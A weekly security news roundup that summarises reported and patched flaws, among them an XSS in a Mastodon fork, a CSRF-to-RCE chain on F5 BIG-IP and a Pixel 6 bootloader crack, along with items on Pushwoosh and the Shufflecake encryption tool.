This Week In Security: Mastadon, Fake Software Company, And ShuffleCake

Due to Twitter’s new policy of testing new features on production, the interest in Mastodon as a potential replacement has skyrocketed. And what’s not to love? You can host it yourself, it’s part of the Fediverse, and you can even run one of the experimental forks for more features. But there’s also the danger of putting a service on the internet, as [Gareth Heyes] illustrates by stealing passwords from, ironically, the instance.

Every service that allows one user to input text, and then shows that text to other users, has to be hardened against cross-site scripting, XSS. That’s the attack where HTML or Javascript can be injected into another user’s experience. Usually this hardening is done with a filter than sanitizes user input. The two features that can trip this up are HTML elements that are allowed, and special parsing features. In this case, that special feature was the tongue-in-cheek “verified” icon that users could add to their display name, by adding a :verified: tag.

Mastodon replaces the tag with an HTML img block which includes double quotes to display the icon. It gets interesting when that icon is inside a user-supplied HTML field, like an <ABBR title="" tag. The double quotes of your ABBR code mismatches with the double quotes created by the verified icon, and you can suddenly inject all sorts of fun code. The door isn’t wide open, though, as Mastodon has a well-written Content Security Policy (CSP). It allows iframes, but other content cannot be loaded from outside domains. This defeats many of the normal attacks, but [Gareth] had a trick up his sleeve — invisible forms.

Password managers, like the one built into Chrome, are pretty aggressive about auto-filling forms, and there isn’t a check for whether those forms are visible. The only catch was how to submit the form. That has to be a user-initiated action. The solution here is to spoof a second message, and fake the toolbar between messages. It’s not a perfect 0-click exploit, but the results are pretty convincing.

[Gareth] reported the flaw to Mastodon and the Glitch fork, and both have issued patches to mitigate the elements of this attack, although core Mastodon wasn’t actually ever vulnerable because it doesn’t allow the <ABBR title=""> attribute in the first place.


It’s pretty common for a company to be registered in one place, and physically do business in another. In the US, Delaware is a popular choice for filing articles of corporation. This is, by the way, why the Twitter vs Musk court case happened in the Delaware Court of Chancery — Twitter is a Delaware company. What’s less kosher is a company based in one country, and claims to be based in another, without the paper trail to disclose. And that seems to be exactly what Pushwoosh is up to.

This would be a relatively uninteresting story, except the fact that Pushwoosh seems to actually be based in Russia, and has taken contracts to do DoD work. It appears that some data handling happens on Pushwoosh servers, including collection of geolocation data. It’s not clear that anything malicious was going on, but this isn’t a risk the US Government is willing to take.

Shufflecake Brings the Deniability

Remember Truecrypt? It was disk encryption software that had some fancy extra features, like hidden volumes for plausible deniability. You could set up an encrypted volume that would show one set of files when given one password, and a different set with another. Development on Truecrypt was abandoned in a weird turn of events, years ago. There’s now a new project that looks to fill the plausible deniability gap, Shufflecake.

It’s open source, runs as a Linux kernel module and userspace tool, and supports nested hidden volumes 15 deep. The encrypted volume is stored in unused block device space, and is completely indistinguishable from random bits on the disk. The plausible deniability bit comes in when decrypting and mounting, as you can just decrypt the outer volume with one password, and it’s impossible to tell whether any additional volumes exists, until a valid password is given.


[Ron Bowes] at Rapid7 has some fun research that achieves Remote Code Execution on F5 BIG-IP and BIG-IQ devices. These are powerful network devices doing traffic shaping at ISP scales, and they run CentOS under the hood. Kudos to F5 for getting a lot right, like leaving SELinux enabled, which apparently made for much more difficult exploitation. The problem is an API endpoint that lacks Cross-Site Request Forgery (CSRF) protections, and these endpoints can be called from a script running on a visited webpage. The attack is to trick an admin into loading such a page, and then hijacking the existing session cookie to call the API.

To pivot into code execution, an RPM specification generator is abused, and a %check command is injected. This gets used in legitimate RPM packages to fire off post-install tests, but here is used to launch a webshell. A few other weaknesses are chained together to get to root-level access. The research was reported to F5, and fixes went out this week.

Pixel 6 Parts Two and Three

We covered part one and part two of this story, but to complete the circle, part three are now available, in the tale of how the Pixel 6 bootloader was cracked. The first hurdle here was finding a section of memory that was marked readable, writable, and executable. Then getting shellcode that will actually execute in this environment is a bit of a challenge, but just the write makefile wizardry generates the needed code. The set of three posts is a great primer on how to go about breaking Android bootloaders.

Next Post

The Nest Audio is my new relaxing white noise machine

Adam Molina / Android Authority I’ve had smart speakers since the first Google Home was announced in 2016 and, for those six years, I’ve known that you can use the speaker to play different relaxing sounds like a make-shift white noise machine. But the feature always seemed like a cool […]
Google Nest Audio in gray on top of book in front of yellow couch.

You May Like